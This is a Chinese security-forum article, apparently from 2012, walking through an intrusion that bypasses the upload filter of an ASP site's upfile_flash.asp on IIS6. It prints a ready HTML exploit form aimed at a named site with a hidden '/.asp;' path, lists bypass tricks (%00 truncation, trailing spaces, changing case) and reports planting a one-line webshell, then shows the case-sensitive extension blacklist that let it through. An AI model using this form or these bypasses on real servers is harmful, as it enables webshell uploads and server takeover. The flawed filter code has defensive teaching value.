热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

突破upfile_flash.asp上传漏洞限制

发布时间:2012-11-16 15:41文章来源:yunsec文章作者:ricker 点击次数:
摘要:一、进入常规网站检测步骤,初探网站信息。 (入侵第一步,确认目标程序。找注入,找后台,找上传) 我习惯性拉出wwwscan扫之,发现upfile_flash.asp upload_flash.asp. HTTP/1.1 200 OK 你懂的,可以直接访问。 这个上传本身就有漏洞,先上传个jpg测试下有...

一、进入常规网站检测步骤,初探网站信息。入侵第一步,确认目标程序。找注入,找后台,找上传)

我习惯性拉出wwwscan扫之,发现upfile_flash.asp upload_flash.asp.

HTTP/1.1 200 OK 你懂的,可以直接访问。
这个上传本身就有漏洞,先上传个jpg测试下有没有写入权限排除WAF各种神器阻拦。

突破upfile_flash.asp上传漏洞限制


图片能正常访问,OK。

进入下一环节,构造上传。先看这里

突破upfile_flash.asp上传漏洞限制


此上传是常见的本地定义路径,突破方法很多。nc%00截断,firebu或者构造html提交1.asp;,神马通通能杀上去。
HTML构造方法:EXP

<form name="form1" method="post" action="http://www.yunsec.net/upfile_flash.asp"
enctype="multipart/form-data" >
<div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
<TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
<TR><td width=20%></td>
<TD bgcolor=#ff0000 width="60%">
<TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
<TR>
<td bgcolor=#ffffff align=center><font color=red>正在上传文件,请稍候...</font></td>
</tr>
</table>
</td><td width=20%></td>
</tr></table></div>
<table class="tableBorder" width="90%" border="0" align="center" cellpadding="3" cellspacing="1"
bgcolor="#FFFFFF">
<tr>
<td align="center" background="images/admin_bg_1.gif"><b><font color="#ffffff">图片上传
<input type="hidden" name="filepath" value="/.asp;">
<input type="hidden" name="filelx" value="">
<input type="hidden" name="EditName" value="">
<input type="hidden" name="FormName" value="">
<input type="hidden" name="act" value="uploadfile"></font></b>
</td>
</tr>
<tr bgcolor="#E8F1FF">
<td align="center" id="upid" height="80">选择文件:
<input type="file" name="file1" size="40" class="tx1" value="">
<input type="submit" name="Submit" value="开始上传" class="button" onclick="javascript:mysub()">
</td>
</tr>
</table>
</form> 


上传出现请不要攻击网站。

突破upfile_flash.asp上传漏洞限制


第一反应就是漏洞经过了修补,添加了过滤。刚刚添加的是1.asp;,换个1.txt;测试。

突破upfile_flash.asp上传漏洞限制


访问文件是存在的,接下来好办了。测试.asa; .cer;,都不能上传。
换nc%00 提交也无法上传。

突破upfile_flash.asp上传漏洞限制

二、针对上传漏洞分析。
IIS6各种杀器,1、解析漏洞1.ASP; 2、 %00截断欺骗上传。3、加空格绕过4、大小写变换。
仔细想想,修补无法是过滤可执行文件。针对这个情况,可以用第3和第4条突破下。
仍然把1.asp;换成1.ASP;再次提交。用刘谦的话来说,见证奇迹吧。

突破upfile_flash.asp上传漏洞限制


成功得到一句话服务器端。


三、再来仔细看看程序的过滤

突破upfile_flash.asp上传漏洞限制

 

  1. Function chkfileExt(savefilename) 
  2. feifaExt="html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|asa|cer" 
  3. fExt = Split(feifaExt, "|") 
  4.  
  5. For i = 0 To UBound(fExt) 
  6. If instr(savefilename,fExt(i))>0 Then '检测是否存在非法字符。 
  7. response.write("非法的文件格式!请不要尝试攻击网站。") 
  8. Response.End 
  9. End If 
  10. Next 
  11.  
  12. End Function 


忽略了大小写,悲剧产生了。
 

标签分类:

上一篇:利用SQLMap进行cookie注入
下一篇:sqlmap交互写shell